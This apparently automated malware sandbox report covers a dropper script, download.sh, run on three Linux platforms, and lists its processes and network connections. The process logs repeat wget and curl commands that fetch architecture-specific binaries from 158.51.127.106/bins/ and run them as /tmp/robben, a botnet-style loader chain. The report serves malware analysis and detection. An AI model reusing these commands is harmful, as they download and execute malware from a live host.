| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp |
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:51
Platform
ubuntu2204-amd64-20240611-en
Max time kernel
270s
Max time network
276s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-timedated.service-6CNoGb systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-timedated.service-6CNoGb systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-timedated.service-6CNoGb systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:51
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
182s
Max time network
183s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-timedated.service-niFsCP systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-timedated.service-niFsCP systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-timedated.service-QQoRad systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.58:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.54:443 | api.snapcraft.io | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:51
Platform
debian9-mipsbe-20240611-en
Max time kernel
182s
Max time network
253s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x download.sh robben systemd-private-a081f6d4a0c548d19a522f73bcbdff25-systemd-timedated.service-GOfuOq]
/tmp/robben
[./robben Payload]
